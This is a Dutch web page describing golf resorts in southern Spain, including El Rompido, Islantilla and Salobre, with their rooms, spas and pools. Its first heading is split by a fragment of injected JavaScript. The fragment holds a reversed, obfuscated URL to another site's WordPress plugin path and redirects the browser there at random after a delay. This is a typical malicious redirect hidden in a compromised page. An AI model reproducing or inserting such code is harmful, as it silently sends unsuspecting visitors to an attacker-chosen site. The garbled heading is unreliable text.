El Rompitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do Golf&Beach Resort
Het Precise Resort El Rompido-The Hotel ligt op een 36-holes golfbaan met uitzicht op de riviermoerassen van Piedras. Het hotel bevindt zich in een rustige omgeving en heeft een spa en een buitenzwembad.De lichte, mooi ingerichte kamers van dit hotel bevinden zich in prachtige tuinen. De kamers beschikken over een balkon, waarvan vele uitzicht op zee bieden. Iedere kamer beschikt over satelliettelevisie en een minibar.
Het Islantilla Golf Resort is een exclusief complex binnen het golfterrein Islantilla, slechts 800 meter van het strand van Islantilla. Het biedt gratis internet, 4 restaurants, een spa en een seizoensgebonden buitenzwembad. Het Islantilla-golfterrein heeft 27 holes. Er zijn ruim voldoende oefen faciliteiten.
Met het Salobre Golf Resort, legt de Dream Destination een bijzondere klemtoon op exclusieve privévilla’s op het golfterrein.